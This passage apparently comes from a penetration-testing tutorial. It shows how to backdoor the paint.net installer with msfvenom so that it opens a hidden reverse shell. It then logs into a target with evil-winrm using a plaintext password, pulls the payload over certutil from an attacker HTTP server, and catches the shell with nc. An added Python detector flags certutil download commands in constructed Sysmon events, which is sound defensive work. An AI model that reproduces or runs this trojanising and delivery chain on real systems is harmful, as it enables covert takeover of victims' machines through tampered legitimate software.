2. Using executable files modified by msfvenom
Let’s continue with placing a payload on the target machine. We can modify any small Windows tool that can be downloaded from the internet, such as PuTTY, WinRAR, photo editors or StickyNotes. I will use an external paint program.
Here is the download link: https://www.getpaint.net/download.html
It is downloaded to the attacker’s machine and modified with msfvenom (a payload generator) on Kali:
msfvenom -a x64 --platform windows -x paint.net.5.0.3.exe -k -p windows/x64/shell_reverse_tcp lhost=attacker_IP lport=listener_nc -b "\x00" -f exe -o paint.exe
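-a for the architecture (x64 here)
--platform for the target OS
-x for the executable file to be modified (used as the template)
-k to keep the template's normal behaviour and run the payload silently in the background
-p for the payload
-f for the output file format
-o for the name of the output file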
Now we can access the target with the previously gained credentials to transfer the payload:
evil-winrm -i target_IP -u Administrator -p Password321
We can pull the payload onto the target machine using certutil, from an HTTP server running on the attacker's machine:
certutil.exe -urlcache -f http://10.8.55.241:7777/paint.exe paint.exe
Start a listener with nc on the attacker machine: nc -lvp 4444
Then execute the transferred payload in the gained shell: ./paint.exe
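On the monitoring side, the certutil transfer above shows up as a process-creation event with a recognisable command line. The following is an added example, not part of the original post: it flags certutil used as a downloader and extracts the URL, the destination and the parent process. The events use Sysmon Event ID 1 field names and are constructed samples; the parent process values are assumptions for illustration.

```python
import ntpath
import re

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def tokens(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def is_certutil(event):
    """Accept either the image file name or the recorded PE OriginalFileName."""
    names = (ntpath.basename(event.get("Image", "")), event.get("OriginalFileName", ""))
    return any(n.lower() == "certutil.exe" for n in names)

def certutil_download(event):
    """Return url/dest/parent for a certutil URL fetch, or None for anything else."""
    if not is_certutil(event):
        return None
    args = tokens(event.get("CommandLine", ""))[1:]
    # certutil accepts both "-switch" and "/switch", in any letter case
    switches = {a[1:].lower() for a in args if a.startswith(("-", "/"))}
    url = next((a for a in args if URL_RE.match(a)), None)
    if "urlcache" not in switches or url is None:
        return None  # e.g. -hashfile, or -urlcache without a URL to fetch
    rest = args[args.index(url) + 1:]
    dest = next((a for a in rest if not a.startswith(("-", "/"))), None)
    return {"url": url, "dest": dest,
            "parent": ntpath.basename(event.get("ParentImage", ""))}

# Constructed process-creation events (Sysmon Event ID 1 field names); not real logs.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://10.8.55.241:7777/paint.exe paint.exe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r'certutil /URLCACHE /f "http://192.0.2.10/a b.exe" "C:\Temp\a b.exe"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -hashfile paint.exe SHA256",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

def scan(events):
    """Return one finding per event that is a certutil download."""
    return [hit for hit in map(certutil_download, events) if hit]

if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

The hash-only invocation in the third event is not reported, which keeps routine certutil use out of the alert stream.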